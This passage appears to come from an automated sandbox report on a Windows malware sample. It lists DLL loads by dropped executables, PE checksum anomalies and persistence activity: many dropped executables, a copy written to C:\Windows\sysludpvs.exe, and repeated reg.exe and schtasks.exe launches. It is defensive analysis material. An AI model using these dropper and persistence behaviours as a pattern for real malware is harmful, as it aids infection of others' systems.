    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe  Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe  Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: mscoree.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: version.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: propsys.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: edputil.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: wintypes.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: appresolver.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: bcp47langs.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: slc.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: userenv.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: sppc.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll
    Source: a0RkmvhSaf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: mscorlib.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdbRSDS source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.Management.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.ni.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: Binary string: System.pdb source: WERBE6A.tmp.dmp.12.dr
    Source: a0RkmvhSaf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: a0RkmvhSaf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: a0RkmvhSaf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: a0RkmvhSaf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: a0RkmvhSaf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: 2047112978.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x6730
    Source: newtpp[1].exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1ebcb
    Source: 2052810334.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x12c25
    Source: 230053364.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1ebcb
    Source: 396820397.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0xd4ec
    Source: 393932919.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0xbb5f
    Source: 634722489.exe.5.dr | Static PE information: real checksum: 0xd961 should be: 0x12961
    Source: 5[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x10942
    Source: 4[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x6730
    Source: 11[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x16659
    Source: 3[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x10942
    Source: 6[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x105a9
    Source: 2[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x12c25
    Source: 7[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0xbb5f
    Source: 2028814805.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x105a9
    Source: sysludpvs.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x1ebcb
    Source: 417928448.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x10942
    Source: 1[1].exe.5.dr | Static PE information: real checksum: 0xd961 should be: 0x12961
    Source: 10[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0xd4ec
    Source: 8[1].exe.5.dr | Static PE information: real checksum: 0x0 should be: 0xf6a9
    Source: 399630275.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x10942
    Source: 203235335.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x16659
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe | Code function: 0_2_00F81A11 push ecx; ret 0_2_00F81A24
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | Code function: 5_2_007B1B71 push ecx; ret 5_2_007B1B84
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe | Code function: 13_2_00007FF7C6B000BD pushad ; iretd 13_2_00007FF7C6B000C1
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe | Code function: 18_2_00007FF7C6B200BD pushad ; iretd 18_2_00007FF7C6B200C1
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe | Code function: 23_2_00007FF7C6AE00BD pushad ; iretd 23_2_00007FF7C6AE00C1
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe | Code function: 28_2_00007FF7C6AF00BD pushad ; iretd 28_2_00007FF7C6AF00C1
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe | Code function: 40_2_00007FF7C6B000BD pushad ; iretd 40_2_00007FF7C6B000C1
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe | Code function: 54_2_00007FF7C6B100BD pushad ; iretd 54_2_00007FF7C6B100C1
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe | Code function: 59_2_00007FF7C6B100BD pushad ; iretd 59_2_00007FF7C6B100C1

    Persistence and Installation Behavior

    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Executable created and started: C:\Windows\sysludpvs.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Windows\System32\cmd.exe | Process created: reg.exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | File created: C:\Windows\sysludpvs.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\7[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\399630275.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\1216017805.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\203235335.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\2047112978.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\634722489.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\417928448.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\3[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\393932919.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\2052810334.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\4[1].exe
